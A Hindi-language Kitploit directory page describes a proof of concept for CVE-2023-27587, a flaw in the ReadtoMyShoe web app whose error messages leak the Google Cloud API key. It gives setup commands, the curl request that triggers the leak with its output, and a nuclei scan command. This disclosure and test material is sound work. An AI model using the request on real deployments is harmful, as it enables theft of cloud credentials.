Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-27587-PoC — CVE-2023-27587 का सरल PoC | Kitploit
उपकरण/GitHubGitHub/vagnerd/cve-2023-27587-poc
भेद्यता विश्लेषणशोषणजानकारी एकत्र करनावेब सुरक्षासीक्रेट डिटेक्शनAPI सुरक्षा
GitHubvagnerd/cve-2023-27587-poc

CVE-2023-27587-PoC

CVE-2023-27587 का सरल PoC

रिपॉजिटरी देखें
51513 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-27587-PoC

CVE-2023-27587 का सरल PoC

ReadToMyShoe क्या है?

ReadtoMyShoe (RTMS) एक वेब एप्लिकेशन (rust, yew और axum) है जो आपको लेख अपलोड करने (URL के माध्यम से या सीधे पेस्ट करके) और बाद में उन्हें सुनने की अनुमति देता है।

प्रभाव

यदि लेख जोड़ते समय कोई त्रुटि होती है, तो वेबसाइट उपयोगकर्ता को एक त्रुटि संदेश दिखाती है। यदि त्रुटि Google Cloud TTS अनुरोध से उत्पन्न होती है, तो इसमें अनुरोध का पूरा URL शामिल होगा। अनुरोध URL में Google Cloud API कुंजी होती है।

PoC

संवेदनशील ReadtoMyShoe सेटअप करें

root@kitploit:~
$ git clone https://github.com/rozbb/readtomyshoe.git
$ cd readtomyshoe && git checkout v0.2.0
$ echo "GCP_KEY_LEAKED_TEST" > server/gcp_api.key
$ DOCKER_BUILDKIT=1 docker build -t readtomyshoe-vul .
$ docker run -p 9382:9382 readtomyshoe-vul

शोषण

कुंजी केवल तब उजागर होती है जब GPC कॉल में त्रुटि होती है!

root@kitploit:~
curl 'http://192.168.15.201:9382/api/add-article-by-text' -X POST \ -H 'Accept-Encoding: gzip, deflate' \ -H 'content-type: application/json' \ --data-raw '{"title":"Kernsicherheitstest","body":"Kernsicherheitstest"}'

प्रतिक्रिया त्रुटि (उजागर API कुंजी):

root@kitploit:~
TTS failed: TTS request failed

Caused by:
    HTTP status client error (400 Bad Request) for url (https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=GCP_KEY_LEAKED_TEST%0A)

2023-03-15 13-03-59 का स्क्रीनशॉट

nuclei-template

https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2023/CVE-2023-27587.yaml

root@kitploit:~
$ nuclei -t cves/2023/CVE-2023-27587.yaml -u http://<host>

2023-03-15 13-22-23 का स्क्रीनशॉट

संदर्भ

https://github.com/rozbb/readtomyshoe/security/advisories/GHSA-23g5-r34j-mr8g

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27587

https://beta.readtomyshoe.com/

टूल डाउनलोड करें